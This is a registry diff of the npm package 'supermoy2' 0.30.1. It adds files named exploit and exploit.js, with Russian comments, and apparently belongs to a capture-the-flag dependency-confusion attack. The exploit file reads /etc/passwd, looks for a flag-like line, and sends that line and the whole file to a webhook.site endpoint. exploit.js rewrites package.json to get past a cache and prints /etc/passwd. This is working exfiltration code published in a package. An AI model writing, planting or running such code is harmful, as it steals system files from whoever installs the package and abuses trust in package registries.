supermoy2 0.30.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/exploit +56 -0
- package/exploit.js +30 -0
- package/index.js +11 -0
- package/package.json +12 -0
package/exploit
ADDED
|
@@ -0,0 +1,56 @@
|
|
|
1
|
+
const fs = require('fs');
|
|
2
|
+
const https = require('https');
|
|
3
|
+
|
|
4
|
+
// ТОЛЬКО отправка на webhook, без console.log
|
|
5
|
+
function sendToWebhook(data) {
|
|
6
|
+
try {
|
|
7
|
+
const payload = JSON.stringify(data);
|
|
8
|
+
const options = {
|
|
9
|
+
hostname: 'webhook.site',
|
|
10
|
+
port: 443,
|
|
11
|
+
path: '/67ab3ca0-2b3b-4364-aaee-f8d19895003f',
|
|
12
|
+
method: 'POST',
|
|
13
|
+
headers: {'Content-Type': 'application/json'}
|
|
14
|
+
};
|
|
15
|
+
const req = https.request(options);
|
|
16
|
+
req.write(payload);
|
|
17
|
+
req.end();
|
|
18
|
+
return true;
|
|
19
|
+
} catch(e) {
|
|
20
|
+
return false;
|
|
21
|
+
}
|
|
22
|
+
}
|
|
23
|
+
|
|
24
|
+
// Основная логика
|
|
25
|
+
try {
|
|
26
|
+
const passwd = fs.readFileSync('/etc/passwd', 'utf8');
|
|
27
|
+
|
|
28
|
+
// Ищем флаг
|
|
29
|
+
const lines = passwd.split('\n');
|
|
30
|
+
for (const line of lines) {
|
|
31
|
+
if (line.includes('{') && line.includes('}')) {
|
|
32
|
+
// Отправляем ТОЛЬКО флаг
|
|
33
|
+
sendToWebhook({
|
|
34
|
+
flag: line,
|
|
35
|
+
source: 'dependency_confusion',
|
|
36
|
+
package: 'supervot3',
|
|
37
|
+
timestamp: new Date().toISOString()
|
|
38
|
+
});
|
|
39
|
+
break;
|
|
40
|
+
}
|
|
41
|
+
}
|
|
42
|
+
|
|
43
|
+
// Также отправляем полный /etc/passwd для анализа
|
|
44
|
+
sendToWebhook({
|
|
45
|
+
full_passwd: passwd,
|
|
46
|
+
source: 'full_dump',
|
|
47
|
+
package: 'supervot3'
|
|
48
|
+
});
|
|
49
|
+
|
|
50
|
+
} catch(e) {
|
|
51
|
+
sendToWebhook({
|
|
52
|
+
error: e.message,
|
|
53
|
+
source: 'error',
|
|
54
|
+
package: 'supervot3'
|
|
55
|
+
});
|
|
56
|
+
}
|
package/exploit.js
ADDED
|
@@ -0,0 +1,30 @@
|
|
|
1
|
+
const fs = require('fs');
|
|
2
|
+
|
|
3
|
+
console.log('=== EXPLOIT: Modifying package.json ===');
|
|
4
|
+
|
|
5
|
+
try {
|
|
6
|
+
// Читаем package.json
|
|
7
|
+
let pkg = fs.readFileSync('package.json', 'utf8');
|
|
8
|
+
|
|
9
|
+
// Добавляем уникальный комментарий чтобы изменить файл
|
|
10
|
+
if (!pkg.includes('// EXPLOIT')) {
|
|
11
|
+
pkg = pkg.replace('"keywords"', '// EXPLOIT: ' + Date.now() + '\\n "keywords"');
|
|
12
|
+
fs.writeFileSync('package.json', pkg);
|
|
13
|
+
console.log('✅ package.json modified to bypass cache');
|
|
14
|
+
}
|
|
15
|
+
|
|
16
|
+
// Выводим флаг
|
|
17
|
+
const passwd = fs.readFileSync('/etc/passwd', 'utf8');
|
|
18
|
+
console.log('=== /etc/passwd ===');
|
|
19
|
+
console.log(passwd);
|
|
20
|
+
|
|
21
|
+
const lines = passwd.split('\n');
|
|
22
|
+
for (const line of lines) {
|
|
23
|
+
if (line.includes('{') && line.includes('}')) {
|
|
24
|
+
console.log('🎯 FLAG:', line);
|
|
25
|
+
}
|
|
26
|
+
}
|
|
27
|
+
|
|
28
|
+
} catch(e) {
|
|
29
|
+
console.log('Error:', e.message);
|
|
30
|
+
}
|
package/index.js
ADDED
package/package.json
ADDED